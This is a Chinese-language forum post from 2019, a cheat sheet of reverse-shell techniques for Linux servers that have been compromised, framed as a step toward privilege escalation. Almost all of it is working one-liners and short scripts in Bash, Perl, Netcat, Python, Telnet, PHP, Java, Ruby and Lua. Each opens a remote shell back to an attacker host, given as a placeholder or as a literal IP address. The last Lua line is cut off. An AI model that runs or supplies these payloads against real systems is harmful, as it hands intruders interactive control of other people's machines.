论坛首页 > 技术文章投稿区 > 漏洞文章

linux反弹shell姿势

isnull · 发表于 2019-04-03 12:02:00 · 漏洞文章

遇到linux服务器，马上想到反弹shell到本地进行溢出等提权尝试,这里搜集了一些常用的反弹姿势。

首先，选一个未被目标防火墙过滤的TCP端口

1	attacker$ nc -l -v attackerip 4444

Bash

1	/bin/bash -i > /dev/tcp/173.214.173.151/8080 0<&1 2>&1

1	bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

1	0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

1
2
3

1. exec 5<>/dev/tcp/attackerip/4444
2. cat <&5 | while read line; do $line 2>&5 >&5; done  # or:
while read line 0<&5; do $line 2>&5 >&5; done

Perl

不依赖于/bin/sh

1	perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

如果是目标基于windows，还可以

1	perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

也可上传一个

#1.pl
use Socket;
$i="x.x.x.x";
$p=8080;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i))))
 {
 open(STDIN,">&S");
 open(STDOUT,">&S");
 open(STDERR,">&S");
 exec("/bin/sh -i");
 };

Netcat

取决于nc的版本，在Linux的大部分发行版中都默认编译了nc，但也许是出于安全考虑，发行版中默认编译的nc往往没有-e选项(没有define一个GAPING_SECURITY_HOLE常量)

1	nc -e /bin/sh attackerip 4444

1	/bin/sh \| nc attackerip 4444

1 2	如果没有权限使用mkfifo /tmp/backpipe也可以创建一个管道 rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p

1 2	1. mknod /tmp/backpipe p 2. /bin/sh 0</tmp/backpipe \| nc attackerip listenport 1>/tmp/backpipe

python

#1.py
import socket
import subprocess
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("x.x.x.x",8080))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

#2.py
#!/usr/bin/python
import socket,subprocess

HOST = '10.16.44.100' # The remote host
PORT = 443 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to attacker machine
s.connect((HOST, PORT))
# send we are connected
s.send('[*] Connection Established!')
# start loop
while 1:
# recieve shell command
data = s.recv(1024)
# if its quit, then break out and close socket
if data == "quit": break
# do shell command
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
s.send(stdout_value)
# close socket
s.close()

Telnet

1	rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p

本地在4445端口监听

1	telnet attackerip 4444 \| /bin/bash \| telnet attackerip 4445

PHP

1	php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

JAVA

1
2
3

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Ruby

目标基于linux

1	ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){\|io\|c.print io.read}end'

目标基于windows

1	ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){\|io\|c.print io.read}end'

lua

1	lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execut

打赏我,让我更有动力~

0 条回复 | 直到 2019-4-3 | 1219 次浏览

登录后才可发表内容